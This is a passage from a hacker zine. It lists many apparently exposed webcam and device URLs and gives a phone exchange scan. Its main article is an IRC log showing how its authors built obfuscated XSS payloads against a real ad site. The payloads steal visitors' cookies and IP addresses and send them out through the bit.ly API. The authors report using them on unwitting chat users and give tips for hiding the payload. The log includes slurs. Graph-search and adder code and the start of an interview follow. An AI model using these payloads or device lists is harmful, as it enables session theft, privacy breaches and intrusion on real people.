http://83.227.138.166/main.cgi?next_file=main.htm http://75.61.194.41:1024/main.cgi?next_file=index_in.htm http://193.87.102.25/img/main.cgi?next_file=main.htm http://213.198.245.70/img/main.cgi?next_file=main.htm http://74.237.69.5/main.cgi?next_file=main2.htm http://pineairewebcam.dyndns.org/ http://217.159.181.99/ http://193.138.213.166/ http://72.2.138.209:81/ http://ajs01.dyndns.org/ http://62.106.98.204/ http://80.54.239.234/ http://195.47.194.200/ http://78.36.109.5/ http://www.zodiac-bg.com/files/Jview.htm http://82.107.211.3/ http://84.53.31.54/ http://129.170.124.12/ http://193.178.224.10/ http://chrastal.homeip.net:5050/ http://194.112.215.163/ http://129.70.141.62/ http://209.94.75.172/ http://75.149.126.138:89/ http://67.53.198.178/ http://128.103.101.254/ http://157.157.79.85/ http://208.71.234.122/ http://24.25.42.218:52210/ http://65.182.241.193/ http://216.117.210.183:86/ http://203.213.212.174:1365/ http://142.217.181.117:89/ http://87.243.178.244/ http://81.138.9.30:81/ http://122.3.81.6:82/ http://68.101.243.94:82/ http://80.13.146.246/ http://64.203.239.75/ http://193.251.181.104/ http://213.110.240.157/ http://216.160.181.242:10083/ http://67.242.57.128:86/ http://www.rmackey.com/ http://71.194.73.80:4343/ http://209.117.235.143/ http://71.157.136.110:81/ http://216.129.211.131/ http://217.133.212.61/ http://143.107.3.149/ http://210.230.126.237:82/ http://62.147.232.188/ http://216.137.100.129:81/ http://210.230.133.76:82/ http://222.3.77.52:81/ http://222.11.124.75:81/ http://116.64.17.198/ http://210.249.10.81:81/ http://220.217.129.21:81/ http://210.249.21.157:82/ http://222.1.186.218:81/ http://221.119.133.176:81/ http://213.160.168.72/ http://61.204.127.233:82/ http://222.3.114.56:81/ http://71.110.145.16:89/ http://89.234.195.78/ http://99.135.117.196/ http://65.99.253.134/ http://222.11.60.180:81/ http://61.117.29.119:81/ http://82.176.123.82/ http://66.203.223.50:82/ http://24.20.88.10:84/ http://24.19.205.82:8095/ http://59.133.145.190:82/ http://68.16.245.20/ http://220.214.128.66:82/ http://124.105.235.84/ http://222.5.86.181:82/ http://210.169.100.66:82/ http://222.13.239.47:82/ http://208.54.215.145/ http://66.35.88.6/ http://98.112.171.186:81/ http://59.133.146.58:82/ http://195.131.161.122:85/ http://208.71.217.253:50001/ http://220.217.122.193:81/ http://222.15.48.210:82/ http://220.217.130.205:81/ http://98.190.143.254:23/ http://200.124.240.142:8086/ http://70.154.139.169:83/ http://205.250.69.239:81/ http://124.45.116.105:81/ http://61.204.122.175:82/ http://173.46.175.162:32000/ Login required -------------- https://24.206.4.253/index.htm http://24.231.40.38/ http://24.231.41.232/ http://24.231.50.181/ http://24.231.54.90/ http://24.244.132.179/ http://24.244.134.63/ http://24.244.135.87/ http://24.244.135.250/ http://216.137.0.39/auth.html http://216.137.11.89/ http://24.244.145.66:8080/ http://24.244.145.182/ http://24.244.146.129/ http://24.244.146.192/ http://24.244.180.229/ http://64.150.197.130/ http://64.150.207.20/ http://64.150.210.159/ http://64.150.220.6/ http://64.150.220.67/ http://64.150.222.210/ http://64.150.231.141/ http://64.150.237.8/ https://64.150.238.144/auth.html http://64.150.245.160/ http://65.75.92.213/ http://65.75.96.59/ http://65.75.107.70/ http://65.75.114.105/ http://65.75.115.236/ http://200.4.168.164/ http://200.80.109.38/ http://186.1.3.18/ http://186.1.3.69/ http://186.1.10.155/ http://190.106.11.19/ http://190.106.11.20/ http://190.106.14.14/ http://190.106.19.67/ http://190.184.94.41/ http://165.98.224.67/ http://165.98.235.2/ http://165.98.236.114/ http://186.1.14.180/ http://186.1.14.181/ http://186.1.14.182/ http://190.106.11.18/ http://190.184.23.39/ http://190.184.35.95/ http://190.184.40.114/ http://190.184.43.97/ http://190.184.45.153/ http://190.184.72.105/ http://190.212.134.190/ http://190.212.134.242/ http://196.200.49.162/ http://24.1.10.135:1050/ http://24.1.13.39:8080/ http://24.1.16.206/ http://186.1.10.156/login.html?1600&1 http://190.106.4.27/ [==================================================================================================] -=[ 0x0a 303-833-00xx Scan -=[ Author: Shadytel, Inc -=[ Website: http://www.shadytel.com/ 0001 - Expanded Announcement System (no supe) 0002 - Ringout 0003 - Ringout 0004 - Ringout 0005 - Reorder via SS7? 0006 - Burst of 2200 hz 0007 - Ringout 0008 - Busy signal via distant end 0009 - 102-type milliwatt, hangs up after ~3 cycles 0010 - Same as 0009 0012 - Busy via SS7 0013 - Coin deposit rec 0018 - LD service restricted rec 0020 - Reorder via SS7 0021 - Ringout 0022 - Ringout 0030 - Ringout 0031 - Ringout 0032 - Ringout 0034 - Ringout 0035 - Ringout 0036 - Ringout 0037 - Ringout 0038 - Modem - 7/E/1, *displays TID:, then garbage, then TID too long. Please try again.* 0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible. 0041 - Ringout 0057 - 105-type test 0058 - Something via SS7? Recheck 0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the number for long distance and operator assisted calls." 0066 - Dialing 1/0 not necessary rec 0067 - Dial 1 first rec 0068 - 100-type milliwatt 0069 - Dialing 0 not necessary rec 0070 - YCDNGT 0075 - YCDNGT 0076 - CBCAD/call your operator to help you 0077 - CBCAD/check your instruction manual 0078 - Permanent signal rec 0080 - Low tone 0081 - Same as 0078 0082 - Coin deposit rec 0083 - LD service restricted rec 0084 - CAC error rec 0085 - Tandem CBCAD recording? 0086 - Dialing CAC not necessary rec 0087 - Network difficulties rec 0089 - CAC error rec 0090 - ACB rec 0091 - Busy via SS7 0098 - Reorder via SS7? 0099 - DATU [==================================================================================================] -=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro) -=[ Author: Silks, elchupathingy -=[ IRC: irc.gonullyourself.org #gny Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't really capture our thought process and just general fucking around. At some point, during the early hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz. Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands, I approached elchupathingy for ideas of how to export that information without any server-side ties. After some playing around, we came up with a solution that would gather and store a victim's IP address in a clever manner, and then redirect them to a final destination as expected. Here is our chat log (mildly edited to hide moments of stupidity) which explains how we built this up. -Silks Silks: do you know of a site that is like a persistent xss but not even xss? Silks: will just store info temporary Silks: like Silks: x.php?q=lolIstolethisguysip:1.1.1.1 elchupathingy: could use bit.ly to store it Silks: how so elchupathingy: it stores links you shorten Silks: basically, did you see my XSS, JS+PHP implementation? elchupathingy: don't think so elchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about it elchupathingy: lol elchupathingy: http://bit.ly/gsfxLp elchupathingy: see what the link expands to Silks: how would you create that though from JS? elchupathingy: one sec elchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU rl=http://google.com/search?q=".shit_goes_here Silks: k elchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2 52495179&format=json&longUrl=http://google.com/search?q=luls elchupathingy: just a GET or inclusion should work Silks: I guess if you can see the details in your bit.ly account that will export the info elchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrd elchupathingy: thats what it would look like Silks: I know man Silks: but you are ignoring the actual problem Silks: the point is, getting the data from the victims client to you Silks: so if bit.ly account store recently created urls Silks: then you can access that bit.ly and extract the info elchupathingy: ya elchupathingy: woot got the cookie via xss and bit.ly elchupathingy: lol elchupathingy: in a ungodly long xss string Silks: rofl Silks: so like elchupathingy: elchupathingy: lol elchupathingy: ungodly long Silks: win Silks: funny thing is Silks: you can then just bit.ly that long url elchupathingy: exactly lol elchupathingy: and bit.ly will keep track of the people that click on it lol elchupathingy: at the same time of sending you their cookie Silks: guessing the api can retrieve links too Silks: so you can probably write a quick app to grab it back elchupathingy: yep elchupathingy: well what ya mean? elchupathingy: short url to the info? Silks: well Silks: say you wanna xss like 100 people Silks: everytime someone gets owned they create a new bit.ly Silks: so you write an app that connects to bit.ly api and retrieves new bit.ly's Silks: and from that grabs the redirect url and parses the data elchupathingy: maybe elchupathingy: have to look over the api real quick Silks: but yeah you can break it down to two commands elchupathingy: can get the countries for each link, statistics on number of clicks and referrrers Silks: bit_xxs_ify Silks: spits out a bit.ly link that links to the long url Silks: I guess somehow you'd need to inject what you want Silks: like "document.cookie" Silks: or just have a menu of all the options Silks: bit_xss_ify cookie Silks: bit_xss_ify ip Silks: etc Silks: then you'd need Silks: bitly_to_data elchupathingy: ok can get the top 100 urls elchupathingy: through their api Silks: which will grab all your bit.ly urls and push new ones into db elchupathingy: http://bit.ly/fUGVEO Silks: pro stream music elchupathingy: click that wanna see if it works Silks: put it in search box Silks: didn't exe Silks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7 Silks: oh nvm elchupathingy: nah got it elchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma= 251001561.940844074.1295790257.1297648116.1301436811.6 Silks: right realtime_links elchupathingy: lol Silks: what's that? elchupathingy: your click Silks: lolz Silks: weird how that was referrer Silks: was from a blank tab elchupathingy: ya elchupathingy: but ya works fine Silks: stop stealing mah cookies elchupathingy: nom nom cookies Silks: ahh it was just cookies Silks: weird, my cookies show all that info? :\ elchupathingy: ya Silks: ahh google analytics bs elchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1 Silks: tracking cookie elchupathingy: thats mine Silks: check my latest one Silks: sec elchupathingy: http://bit.ly/hbMGMA much better lol Silks: WHY? elchupathingy: cats are awesome elchupathingy: lol elchupathingy: u know elchupathingy: that hurts my feelings Silks: rofl Silks: was trying to tamper data it Silks: but realised that wasn't the actual cookie elchupathingy: oh haha Silks: so just spammed your link Silks: lolz elchupathingy: with hte same thing? Silks: pro music Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q=ELCHUPATHINGY_IS_A_NIGGER elchupathingy: doesn't work with the same thing lol Silks: i can change the cookie in tamper data Silks: but Silks: the js is grabbing document.cookie Silks: and I can't change the url Silks: maybe in webgoat but cba loading that elchupathingy: ah elchupathingy: but that hurts elchupathingy: i mean all caps Silks: shutup Silks: you stole my cookies elchupathingy: you clicked the fucking link lol Silks: I trusted you ;( elchupathingy: haha Silks: bah this is so dumb elchupathingy: lol elchupathingy: hmm elchupathingy: but the bit.ly thing is nice because it guarantees unique cookies Silks: what do you mean? elchupathingy: it hashes the url elchupathingy: and my username elchupathingy: so if the same person comes to the site the cookie will probably be the same and not be sent again elchupathingy: see if anyone in #gny clicks my link lol Silks: nub Silks: shoulda got it to steal their ip elchupathingy: lol elchupathingy: well too late Silks: can do it later elchupathingy: ya elchupathingy: oh thats cool u can modify what the hashes bit.ly goes to elchupathingy: so u could edit the xss as its happening lol elchupathingy: nvm just title Silks: Silks: weird Silks: fucking ssi shit elchupathingy: ya elchupathingy: well nvm not getting anything from the two clicks lol Silks: hmm elchupathingy: but there seems to be confusion over what it is Silks: that xss, can you get it to alert? elchupathingy: ya it's the same one i used to get your cookie elchupathingy: just have a feeling they are using noscript Silks: where is it executing? elchupathingy: in body Silks: the results span? elchupathingy:
Results for Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document. cookie);%3C/script%3E Silks: ahh Silks: works Silks: alert doesn't elchupathingy: oh no strings elchupathingy: gets escaped elchupathingy: works Silks: what I just pasted works elchupathingy: ya Silks: weird that document.alert doesn't work Silks: or Silks: yeah i'm just being dumb elchupathingy: lol Silks: hmm Silks: there is one whatismyip site that returns your ip as text with a specific url elchupathingy: ya i used that Silks: link elchupathingy: sec elchupathingy: http://www.whatismyip.com/automation/n09230945.asp Silks: hmm Silks: technically got it working Silks: but getting owned by access-control-allow-origin elchupathingy: getting the ip? or getting it to work as a xss? Silks: printing the ip Silks: once I got it, easymode Silks: that specific XSS site though doesn't allow for it elchupathingy: ah Silks: hmm Silks: but then, that is odd that yours works Silks: ahh, something to do with actually accessing the method Silks: as readystagechange or w/e elchupathingy: im sending the request which is cool Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange =function(){%20alert(x.status);%20};x.send();%3C/script%3E Silks: SAFE Silks: honestly Silks: not a dirty liar like you elchupathingy: lol elchupathingy: 0,0,0,0 Silks: ? elchupathingy: alert boxes Silks: yeah Silks: that's with x.status Silks: should be 200 Silks: if you fire up JS console you will see the error elchupathingy: not getting an error Silks: browser? elchupathingy: ff4 Silks: oh it's fucking chrome elchupathingy: im mean i get a error on the page but its there no matter what elchupathingy: $(document).pngFix elchupathingy: is not a function Silks: although it's still not quite right Silks: still should return 200 elchupathingy: ya Silks: well it is grabbing 200 Silks: something up with code Silks: meh down to this origin bs Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116 ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==% 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3E Silks: code effectively works Silks: well maybe, on another host Silks: but if you can host a file elsewhere then you can either chain JS where it does work or use PHP etc elchupathingy: ya elchupathingy: think i got it elchupathingy: one sec elchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x% 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49 ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3E elchupathingy: http://bit.ly/f1Ygcc :D Silks: nice work elchupathingy Barney-: =] Barney-: what happened Silks: umm, we were messing around with XSS Barney-: rgr Silks: now have XSS code that can steal your IP Silks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in bit.ly links Barney-: hmm Silks: yeah Barney-, check this Barney-: ?? Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47, 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3E Silks: this will print the response page of a whatismyip site Barney-: very cool Silks: I was trying with a different site and it was failing Barney-: thats real cool actually Silks: elchu tried with that one Silks: and then used regex Silks: so Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q= Silks: also we were discussing how to export info and talked about creating bit.ly links with APIs Silks: found out that it is possible to retrieve newly created links in the API too Silks: so.. Barney-: but Barney-: how do you figure out Barney-: the bit.ly link Barney-: after its been created Silks: because of a bit.ly account Silks: so Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q= Silks: will create the url Barney-: ah ok ok Barney-: so you login to the account Silks: and you can export the data but adding it to q= Barney-: but we don't want IPs we want coookies Silks: idd Silks: so Silks: if you look at the url above Silks: you just do Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179 &format=json&longUrl=http://google.com/search?q= + document.cookie Barney-: ah rgr Silks: specifically that above looks like Silks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98, 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie)); Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store an IP in a bit.ly account Barney-: ya but in what type of attack scenario would IP be helpful? Silks: was saying before, obviously we can just store all this info in the same way I did with my XSS session stealer. call a .php and store it in a db Barney-: dont get me wrong its cool, just wondering application Barney-: could do it easier Barney-: and be like Barney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...) Barney-: it'll 404, and show up in access_log Barney-: voila Silks: hence what I said above but yeah Silks: this is just a way of doing it without any hosting etc Barney-: true Silks: and pretty interesting to be storing info in bit.ly links Silks: that page wouldn't 404 if you just added a get var Silks: funny thing is, when you've made the full XSS you can just package it up in a bit.ly Silks: elchu posted it in #gny and a couple of people clicked and didn't even understand what happened Silks: specifically, Compound and jmp got XSS'ed and knew no better Barney-: hahah Barney-: a bit.ly starts the XSS Barney-: and ends up in a bit.ly Barney-: hence why I don't trust you Barney-: and i go curl -I silks-dumb-links.com Silks: almost done Silks: gonna own #gny Silks: Barney- Silks: mind testing this? Silks: http://bit.ly/e93lCU Silks: bit.ly/gvZPM8 Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q= Barney-: MIME-Version: 1.0 Barney-: Content-Length: 1177 Barney-: how do you pass a mime-version Barney-: with no mime type Silks: probably to do with the bit.ly link elchupathingy: just woke up Silks: tricked a few people lolz elchupathingy: ya saw elchupathingy: i was happy with the ip lol elchupathingy: but having to add in the random ass semicolons was annoying Silks: I'm thinking it might be possible to use browser location tracking to grab data elchupathingy: probably Silks: you know the browser sends a list of all the access points and macs near you Silks: crazy shit Silks: then you can use those macs with google api to triangulate your position elchupathingy: never tried to use it Silks: crazy how much data your browser sends though elchupathingy: ya Silks: would be lol to XSS->triangulated position Silks: similar shit to what samy did Silks: but without being a fucking tool elchupathingy: heh elchupathingy: well you can get it but ff asks for permission to get the lat,lng Silks: yeah Silks: but if location tracking is enabled it goes through elchupathingy: true then its fucking simple lol Silks: you're fucking simple Silks: think only in the past 6 months-year they started asking users tbh elchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc); elchupathingy: er elchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati on.getCurrentPosition(loc); Silks: listening to that song you stole from my cookies d4rK3r: who is more awesome then i? http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest ()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47% 2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue) %3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new +RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44 %2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c5 1%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState% 3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116.. ..d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c4 7%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47 %2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99% 2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c5 3%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2 c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(d ocument.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e This XSS string is the final product of the above discussion, shown above incorporates the grabbing of the user's IP and cookie and utilizing the bit.ly storage method also outlined above. The simple bit.ly API makes this method of cookie grabbing simple and effective. Getting the cookie information is a simple request to the bit.ly services, and all of the relevant information will be returned in a XML or JSON string. Duplicate entries are effectively nulled by how bit.ly hashes the URL to create its shortened ones. Accounts are easily created, and thus the links and storing of information can be distributed amoungst many different bit.ly accounts. This makes it much harder to find the sole source of the links. A combination with other URL shortening services such as goo.gl, on.fb.me, and tinyurl can make this a very robust method of cookie stealing. The XSS string above can be tweaked to hide its real intentions and can effectively work against someone that does not question links sent to them. A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript will not be affected, but utilizing other standard XSS techniques and server-side files could ensure that if you can't grab both the IP+cookie, you can at least grab an IP. As simple as this technique may be, there is a lot more potential for further privacy and security breaches if you can think outside the box. Not to mention that we think storing data in bit.ly is pretty hilarious. [==================================================================================================] -=[ 0x0c Programming Challenge -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email. -------------------------------------------------------------------------------- Last issue, we asked readers to compare the depth-first search and breadth-first search routing algorithms against a given graph. Graph Solution by melte Language: Perl -------------------- #!/usr/bin/perl use strict; use warnings; my $obj = { points => build_tree() }; # Uncomment for examples given in the article =pod for ('C', 'D', 'E') { my $end = breadth_first($obj, 'A', $_); my $mid = depth_first($obj, 'A', $_); print "A -> $_ : DF=$mid BF=$end\n"; } exit; =cut for my $first (sort { $a cmp $b } keys %{$obj->{points}}) { for my $second (sort { $a cmp $b } keys %{$obj->{points}}) { my $df = depth_first($obj, $first, $second); my $bf = breadth_first($obj, $first, $second); my $message = ($df != -1 && $df < $bf) ? "Depth-First" : ($df > $bf && $bf != -1) ? "Breadth-First" : "Tie"; print "$first -> $second : DF=$df, BF=$bf : $message\n"; } } # The data structure I'm using is a hashref with letters as keys, # and an arrayref (as the value) listing its neighbours sub build_tree { my (@input) = @_; my $vertex = {}; # Not strictly necessary but this + the check below is good for catching typos while ($input[0] =~ /(\w+)[,}]/g) { $vertex->{$1} = []; } while ($input[1] =~ /\{(\w+)\,(\w+)\}/g) { defined $vertex->{$1} and defined $vertex->{$2} or die "Malformed point [$1,$2]"; push @{$vertex->{$1}}, $2; push @{$vertex->{$2}}, $1; } $vertex; } # Setup the structure and enter recursion sub depth_first { my ($obj, $start, $end ) = @_; $obj = { checked => [], points => $obj->{points} }; $start eq $end and return 0; _depth_first($obj, $start, $end); } # Check all trees from a starting point sub _depth_first { my ($obj, $start, $end) = @_; defined $obj->{checked} or $obj->{checked} = []; push @{$obj->{checked}}, $start; for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}}) { # We can exclude previously checked items grep { $_ eq $neighbour } @{$obj->{checked}} and next; push @{$obj->{checked}}, $neighbour; $neighbour eq $end and return 1; my $counter = _depth_first($obj, $neighbour, $end); $counter != -1 and return $counter + 1; } return -1; } # Surely there is a pretty and short recursive way to do this sub breadth_first { my ($obj, $start, $end) = @_; $start eq $end and return 0; my $tree = $obj->{points}{$start}; my $level = 0; @$tree = sort { $a cmp $b } @$tree; while (1) { ++$level; # This problem could exist with a discontinuous graph as input @$tree or return -1; grep { $_ eq $end } @$tree and return $level; # We don't want to add items and then sort # We want to add sorted lists to preserve correct ordering my $temp = []; for my $item ( sort { $a cmp $b } @$tree ) { # Exclude the parent node in this context push @$temp, grep { $_ ne $item } @{$obj->{points}{$item}}; } $tree = $temp; } } # Uncomment for smaller graph from article =pod __DATA__ V = {A,B,C,D,E} E = {{A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}} __END__ =cut __DATA__ V = {A,B,C,D,E,F,G,H} E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}} -------------------- $ perl graph.pl A -> A : DF=0, BF=0 : Tie A -> B : DF=1, BF=1 : Tie A -> C : DF=5, BF=2 : Breadth-First A -> D : DF=4, BF=1 : Breadth-First A -> E : DF=6, BF=2 : Breadth-First A -> F : DF=3, BF=1 : Breadth-First A -> G : DF=2, BF=2 : Tie A -> H : DF=3, BF=2 : Breadth-First B -> A : DF=1, BF=1 : Tie B -> B : DF=0, BF=0 : Tie B -> C : DF=3, BF=3 : Tie B -> D : DF=2, BF=2 : Tie B -> E : DF=4, BF=3 : Breadth-First B -> F : DF=3, BF=2 : Breadth-First B -> G : DF=4, BF=1 : Breadth-First B -> H : DF=5, BF=1 : Breadth-First C -> A : DF=2, BF=2 : Tie C -> B : DF=3, BF=3 : Tie C -> C : DF=0, BF=0 : Tie C -> D : DF=1, BF=1 : Tie C -> E : DF=2, BF=1 : Breadth-First C -> F : DF=5, BF=2 : Breadth-First C -> G : DF=4, BF=3 : Breadth-First C -> H : DF=5, BF=4 : Breadth-First D -> A : DF=1, BF=1 : Tie D -> B : DF=2, BF=2 : Tie D -> C : DF=1, BF=1 : Tie D -> D : DF=0, BF=0 : Tie D -> E : DF=2, BF=1 : Breadth-First D -> F : DF=4, BF=1 : Breadth-First D -> G : DF=3, BF=2 : Breadth-First D -> H : DF=4, BF=3 : Breadth-First E -> A : DF=3, BF=2 : Breadth-First E -> B : DF=4, BF=3 : Breadth-First E -> C : DF=1, BF=1 : Tie E -> D : DF=2, BF=1 : Breadth-First E -> E : DF=0, BF=0 : Tie E -> F : DF=6, BF=2 : Breadth-First E -> G : DF=5, BF=3 : Breadth-First E -> H : DF=6, BF=4 : Breadth-First F -> A : DF=1, BF=1 : Tie F -> B : DF=2, BF=2 : Tie F -> C : DF=3, BF=2 : Breadth-First F -> D : DF=2, BF=1 : Breadth-First F -> E : DF=4, BF=2 : Breadth-First F -> F : DF=0, BF=0 : Tie F -> G : DF=3, BF=1 : Breadth-First F -> H : DF=4, BF=2 : Breadth-First G -> A : DF=2, BF=2 : Tie G -> B : DF=1, BF=1 : Tie G -> C : DF=4, BF=3 : Breadth-First G -> D : DF=3, BF=2 : Breadth-First G -> E : DF=5, BF=3 : Breadth-First G -> F : DF=4, BF=1 : Breadth-First G -> G : DF=0, BF=0 : Tie G -> H : DF=2, BF=1 : Breadth-First H -> A : DF=2, BF=2 : Tie H -> B : DF=1, BF=1 : Tie H -> C : DF=4, BF=4 : Tie H -> D : DF=3, BF=3 : Tie H -> E : DF=5, BF=4 : Breadth-First H -> F : DF=4, BF=2 : Breadth-First H -> G : DF=5, BF=1 : Breadth-First H -> H : DF=0, BF=0 : Tie By running this script, we can clearly see from the output that breadth-first search is the winning algorithm out of the two. However, this is not always the case. Some graphs will be better traversed by means of depth-first search, while others will not. A judgment call must be made depending on the specific scenario. For instance, massive graphs with a target that is many hops away from the origin point will more likely be searched by depth-first search simply due to resource limitations. Breadth-first search of a massive graph requires many layers upon layers of recursion. An entire "tree" must be stored in memory, which will quickly run low as the tree grows, causing swapping to occur or the system to crash when the available RAM hits zero. With depth-first search, only a single "branch" of recursion is stored in memory, requiring much less space. -------------------- Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the challenge of writing any one of a number of bit adders. Ripple-Carry Adder by Suzaku Language: Java -------------------- import java.util.Scanner; class adder{ public static void main(String args[]){ int bitS[],obA[],obB[],i,cin=0,cout=0; String bitA,bitB; char a,b; Scanner input=new Scanner(System.in); obA=new int[100]; obB=new int[100]; bitS=new int[100]; System.out.println("Enter the bit pattern A"); bitA=new StringBuffer(input.next()).reverse().toString(); System.out.println("Enter the bit pattern B"); bitB=new StringBuffer(input.next()).reverse().toString(); if(bitA.length()==bitB.length()){ System.out.print("Sum = "); for(i=0; i0; i--) System.out.print(bitS[i-1]); System.out.print("\nCarry = "+cout); } else System.out.print("Length of A and B should be same"); } } [==================================================================================================] -=[ 0x0d The Scoop on LIGATT LIGATT Security International (more commonly known as just LIGATT) is a security company founded and run by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world's number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his company's educational courses. Much controversy surrounds Evans and his company with allegations of severe debt, shady marketing schemes, and and overall lack of security knowledge necessary to provide consulting services of any capacity. Attrition.org claims that Evans is currently in debt of over $9,000,000 USD, and the Better Business Bereau currently lists LIGATT as an 'F' rating. Evans denies all counts of misdoing and considers himself a wealthy, successful businessman. In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After a few days of conversation with Evans' PR assistant, the interview request was accepted. The interview spanned across two days (due to phone difficulties) and about 2 hours and 10 minutes of conversation was recorded. A detailed look at Evans' past was provided, and many shots were taken at the people and organizations calling 